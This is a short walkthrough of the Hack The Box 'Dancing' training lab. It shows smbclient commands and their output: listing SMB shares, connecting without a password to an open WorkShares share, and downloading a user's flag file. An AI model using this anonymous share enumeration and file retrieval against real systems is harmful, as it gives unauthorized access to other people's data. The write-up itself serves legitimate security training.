#####################
# Sources and Links #
#####################

#########
# TL,DR #
#########
Nmap shows an SMB share.
There is a WorkShares disk with no authentication.
We can access Jame's home directory and the flag.

########
# Hack #
########
┌──(ryan㉿kali)-[~/HackTheBox/Dancing]
└─$ smbclient -L 10.129.49.137

Enter WORKGROUP\ryan's password: <ENTER>

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.49.137 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(ryan㉿kali)-[~/HackTheBox/Dancing]
└─$ smbclient '\\10.129.49.137\WorkShares'
Enter WORKGROUP\ryan's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 02:22:01 2021
  ..                                  D        0  Mon Mar 29 02:22:01 2021
  Amy.J                               D        0  Mon Mar 29 03:08:24 2021
  James.P                             D        0  Thu Jun  3 02:38:03 2021

                5114111 blocks of size 4096. 1732393 blocks available
smb: \> get James.P\flag.txt 
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
                                                                                                
┌──(ryan㉿kali)-[~/HackTheBox/Dancing]
└─$ ls -l flag.txt
ls: cannot access 'flag.txt': No such file or directory
                                                                                                
┌──(ryan㉿kali)-[~/HackTheBox/Dancing]
└─$ ls            
 Dancing_user.txt  'James.P\flag.txt'   nmap_quick.txt
                                                                                                
┌──(ryan㉿kali)-[~/HackTheBox/Dancing]
└─$ ls -l James.P\\flag.txt 
-rw-r--r-- 1 ryan ryan 32 Feb 20 09:26 'James.P\flag.txt'


###########
# Learned #
###########
Connecting to a network share with smbshare.
$ smbclient '\\10.129.49.137\WorkShares'
